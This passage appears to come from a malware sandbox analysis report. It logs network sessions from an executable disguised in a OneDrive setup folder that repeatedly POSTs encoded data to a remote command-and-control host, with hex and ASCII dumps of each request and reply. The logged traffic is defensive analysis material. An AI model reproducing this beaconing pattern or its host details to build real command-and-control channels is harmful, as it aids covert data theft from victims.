                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0506b3a4870-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1298654&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        47 | 192.168.2.4 | 49783 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:47.608357906 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:47.995385885 CET | 1076 | OUT | Data Raw: 57 54 59 52 50 5e 53 50 58 57 50 59 55 5f 5b 5e 54 59 5c 5d 59 57 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYRP^SPXWPYU_[^TY\]YWZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8&X<+!04,&3&-8) Z#9?%)]+[&8!:: F$,Z*
                                                        Oct 30, 2024 05:22:48.212956905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:48.532212973 CET | 780 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GOVraUT5FXg%2FUJHDgLBUvP2WkZaaPVVAFC0WmrboCpdEKVCmhNksZJBalSgCbw8dt8BUIsYcsF39ovH%2FxNFfYMqzOaBv4j3t%2FvN6FBlid5CFWgEdPKwlplrmKsqmezS8z1VunDVMhk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a056fbe72e64-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1646&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=905000&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:48.532234907 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        48 | 192.168.2.4 | 49784 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:48.663301945 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.012535095 CET | 1076 | OUT | Data Raw: 57 51 59 56 50 5e 56 55 58 57 50 59 55 51 5b 5f 54 5b 5c 54 59 57 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYVP^VUXWPYUQ[_T[\TYWZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%, =+:Z08.3$=_;Y \ &7_)6>&85.* F$,Z*


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        49 | 192.168.2.4 | 49785 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:49.208282948 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.558363914 CET | 1340 | OUT | Data Raw: 57 51 59 50 50 5a 56 5c 58 57 50 59 55 5f 5b 58 54 5b 5c 58 59 55 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYPPZV\XWPYU_[XT[\XYUZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,3.?&%.+D9632^,* ,1_#])&)'%[: F$,Z*
                                                        Oct 30, 2024 05:22:49.813435078 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:50.120505095 CET | 933 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3ud3kgPf0H4N9Gytk%2FpEvxFRecr6c4h4S1uutijBae4eDZotQA7jc0pSErowfa2HD6SxygZH1cmFqX8H4357zcrrDNIAxpgZEZ4mVbF0JGEcVhLC6yjpvvp60iOa8%2BYCdLA1wVJnIk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a060fb5b6c5e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1306859&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 2b 16 37 0e 31 33 39 03 3c 2c 03 1d 2a 3e 25 04 33 1f 01 04 26 05 32 10 2b 3b 05 5e 3d 34 37 06 29 21 28 5d 20 25 34 5b 2a 2b 2f 46 0c 10 24 02 33 22 2c 0c 3c 23 2d 58 3d 06 3b 59 34 09 26 11 3e 39 01 54 21 0a 20 12 24 32 25 0f 3b 03 04 10 3a 25 2a 5b 2d 0a 20 1c 2a 3a 21 57 08 14 22 59 26 12 02 00 32 3d 0a 14 26 1c 26 11 22 2f 3b 11 36 38 2e 5c 3f 3b 2c 52 26 0e 38 1d 30 33 20 0e 32 07 0d 04 3c 32 2c 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W+7139<,*>%3&2+;^=47)!(] %4[*+/F$3",<#-X=;Y4&>9T! $2%;:%*[- *:!W"Y&2=&&"/;68.\?;,R&803 2<2,'3"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        50 | 192.168.2.4 | 49786 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:49.436001062 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.792682886 CET | 1076 | OUT | Data Raw: 57 54 59 55 50 5a 53 55 58 57 50 59 55 5c 5b 5d 54 5e 5c 5f 59 5d 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYUPZSUXWPYU\[]T^\_Y]Z\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/\+2Y%.;C,64%> ^8*4:<1,+53=_/* F$,Z*5
                                                        Oct 30, 2024 05:22:50.029676914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:50.344172001 CET | 787 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTkaaGqfoOAMyIfqa%2Fz%2BGuu5BGg29Oj7QdyHe%2FjcTRlZAXCg6Zmxp9lmjemFx8WPP0wpFeNxv%2BgGyq2XvKg%2FU%2FwnblLNhS07972kEiIKMOZNHRJWR5O2XyTKhQQMfn2b2ptKxSWqUpE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0625bdb3470-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1302158&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:50.344187975 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        51 | 192.168.2.4 | 49787 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:50.625813961 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:50.980386972 CET | 1076 | OUT | Data Raw: 57 5e 5c 50 55 55 56 54 58 57 50 59 55 5f 5b 5c 54 53 5c 55 59 5c 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\PUUVTXWPYU_[\TS\UY\ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z,_=(-'=#C.4]2>8Y8$[#*Z1_7X?&>&+!:: F$,Z*
                                                        Oct 30, 2024 05:22:51.224934101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:51.431576967 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3URUPnuugaeZkLW20HgwPg2pv4OWQMUJ9ktW2qS43%2Fu2DaRE7u9P6jozD%2BZlEyFW1IlxYK3dNBMBDYZWkoEmgshZFrABPVBmniBN0xN4nx9R1F7sn8PdvHLqm8eeFl576o%2Fsyoe2N4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a069c8588d26-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1143759&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        52 | 192.168.2.4 | 49788 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:51.567152023 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:51.917705059 CET | 1076 | OUT | Data Raw: 52 54 5c 57 55 55 56 53 58 57 50 59 55 51 5b 5c 54 52 5c 55 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\WUUVSXWPYUQ[\TR\UYQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[,"+8&Z0-C.6+%3847]%*+]<]$(-.: F$,Z*
                                                        Oct 30, 2024 05:22:52.176901102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:52.514240026 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVB1PFaC7A3kVlffBwEveSEo4%2BEdu6hj0WYgtwNNe5r3SJiTeu81Q2f5Rg%2Fxm36gtEuZ2Tw0DbMAvZyVsZGcfibRCyStPMKjqhfqjRPX5Wz7Xhl7kkRY2HktiptQxqrf29ublyl%2B1Vo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a06fcb00b798-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1346976&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        53 | 192.168.2.4 | 49789 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:52.637484074 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:52.996052027 CET | 1076 | OUT | Data Raw: 52 50 5c 53 50 5a 53 56 58 57 50 59 55 5c 5b 5c 54 5e 5c 5d 59 5d 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\SPZSVXWPYU\[\T^\]Y]ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8#9+]'-952[,Y;<Y"94%9+^+23(*. F$,Z*5
                                                        Oct 30, 2024 05:22:53.233419895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:53.444359064 CET | 784 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=569WAd0Aws%2FYYte0F7G%2ByJRLiVb0SVBge14AeUragI8tm9i9kDfTwwPuDylgrEdoO9RtJH8PVN1zRrs7m4BvDu38Mm41tTi5YUAQAhzPbGqjjZ1AHUBXSnm1GRQDiFS57FgrsNDi800%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0765cb0eaa4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1473041&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        54 | 192.168.2.4 | 49790 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:53.573873997 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:53.933357954 CET | 1072 | OUT | Data Raw: 57 51 5c 54 55 59 53 57 58 57 50 59 55 58 5b 5e 54 58 5c 5a 59 52 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\TUYSWXWPYUX[^TX\ZYRZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- =?+2'[89%42$_/*+#)7\%9)6)_0;". F$,Z*5
                                                        Oct 30, 2024 05:22:54.177365065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:54.423239946 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT6nRJ9UhLSh610BlLjxGOO4eF10v%2Be%2F9GFi5qVldpVth2qYGTLWJM9zjtgqLIjULckrYO9nw3YOhrG1C9lLC9oFmXbkrbdFzWfwvo1O5dlEVYyImao62TOq5WdAxG%2Ftz2FhgWiLIbw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a07c4d39e91a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1146476&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:54.423285961 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT6nRJ9UhLSh610BlLjxGOO4eF10v%2Be%2F9GFi5qVldpVth2qYGTLWJM9zjtgqLIjULckrYO9nw3YOhrG1C9lLC9oFmXbkrbdFzWfwvo1O5dlEVYyImao62TOq5WdAxG%2Ftz2FhgWiLIbw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a07c4d39e91a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1146476&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        55 | 192.168.2.4 | 49792 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:54.550302982 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:54.902040958 CET | 1072 | OUT | Data Raw: 52 53 5c 51 50 5a 56 53 58 57 50 59 55 58 5b 53 54 5e 5c 5f 59 54 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\QPZVSXWPYUX[ST^\_YTZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/"=8!$=,5$-+/: 7*$%?_'5[: F$,Z*


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        56 | 192.168.2.4 | 49793 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:55.144041061 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1312
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:55.495832920 CET | 1312 | OUT | Data Raw: 57 52 59 57 50 59 53 57 58 57 50 59 55 5f 5b 53 54 58 5c 5b 59 52 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WRYWPYSWXWPYU_[STX\[YRZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-#%<($'D:<^%[0,*8Z :+&)X?9Z'(-- F$,Z*
                                                        Oct 30, 2024 05:22:56.670042992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671462059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:56.671478033 CET | 936 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:55 GMT
